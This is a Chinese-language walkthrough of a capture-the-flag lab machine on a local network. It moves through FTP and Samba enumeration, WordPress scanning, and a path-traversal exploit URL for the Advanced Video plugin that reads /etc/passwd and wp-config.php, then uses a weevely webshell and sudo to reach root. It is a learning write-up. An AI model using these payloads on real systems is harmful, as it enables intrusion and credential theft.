从这一台靶机开始
就要上VirtualBox了
开机界面就是个这
就凑合一下 开桥接
确定靶机ip地址 :192.168.56.102
要上 了哦!!!!!
扫出 好多 好多 端口 像极了一个蜜罐
我淦
从ftp 入手吧 进行匿名登录
进行查看 下载到本地
打开 康康
Elly说请确保更新了有效负载信息,完成后将其保留在您的FTP帐户中,John
拿到俩个用户Elly和John
继续 ssh 进行 登录
尝试失败
看80端口
使用nikto(开源WEB安全扫描器)进行扫描试试…
没啥用
信息 先放着
继续 看搜集到的信息
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
看看139的Samba信息,这是一个开放的netbios-ssn,用smbclient
来查看(属于samba套件,它提供一种命令行使用交互式方式访问samba服务器的共享资源)
smbclient -L 192.168.56.102
Enum4linux是一个用于枚举来自Windows和Samba系统的信息的工具
或者 可以 拿Enum4linux康康
enum4linux 192.168.56.102 >a1.out
进行查看 也是可以看到的
抓取了两个活跃的用户 kathy、tmp
命令:smbclient //fred/kathy -I 192.168.56.102 -N
使用smbclient
连接到此共享,并看到有两个文件夹kathy_stuff
和backup
发现的东西 通通拷到本地 进行查看
继续访问tmp
smbclient //fred/tmp -I 192.168.56.102 -N
同样 拷到本地来
进行 查看信息
亲爱的凯西,您还应该在WordPress根文件夹中备份wp-config.php文件…
nmap 还扫描出了 3306 尝试mysql 登录一下 也失败了
nmap扫描出:
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
进行访问康康
发现新用户
运行nikto查看下网站信息,发现存在三个目录/admin112233/
,/blogblog/
和/phpmyadmin/
根据信息搜集可以知道目标开启了https访问形式,因为有加载证书
1:
2:
3:
2:查看页面源代码 发现
admin112233
目录将我重定向到xss-payloads.com
blogblog
让我进入了WordPress的博客
wpscan 进行扫描
命令
wpscan --url https://192.168.56.102:12380/blogblog/ --disable-tls-checks -eu
- –disable-tls-checks #禁用SSL/TLS证书验证。
同时发现86个漏洞和一些目录
发现一个uploads应该是个文件目录
访问 康康 同样 要用https
LFI漏洞利用
发现advanced video模块,searchsploit查一下有没有可以利用的payload
searchsploit advanced video
知道了39646.py 进行学习 一下
构造一个URL
https://192.168.56.102:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../../../../../../../../../etc/passwd
页面出现一个URL
访问一下
https://192.168.56.102:12380/blogblog/wp-content/uploads/
在这个 目录下 生成一张图片
下载到本地 进行查看
wget --no-check-certificate https://192.168.56.102:12380/blogblog/wp-content/uploads/1062830421.jpeg
进行查看 发现把靶机 文件读取出来了
既然 他会读取文件
那么wp-config.php
应该和wp-admin
目录在一个目录下,所有我们构造出的url是:
https://192.168.56.102:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php
同样是生成了一张图片
下载 查看
发现mysql数据库 账号 密码
进行 登录
把 user_pass 考出来 放到文本中
上大哥 john 进行 破解密码 :incorrect
使用john用户登陆
这里有一个可以上传 文件的地方
weevely 连接木马
发现 用户名 密码
用户peter
密码JZQuyIN5
进行ssh登录
发现可以sudo提权
直接切换 root用户
flag:b6b545dc11b7a270f4bad23432190c75162c4a2b
下面 还有内核提权
运行uname -a
,发现内核版本为ubuntu 16.04
应该可以进行提权
ok 就讲到这里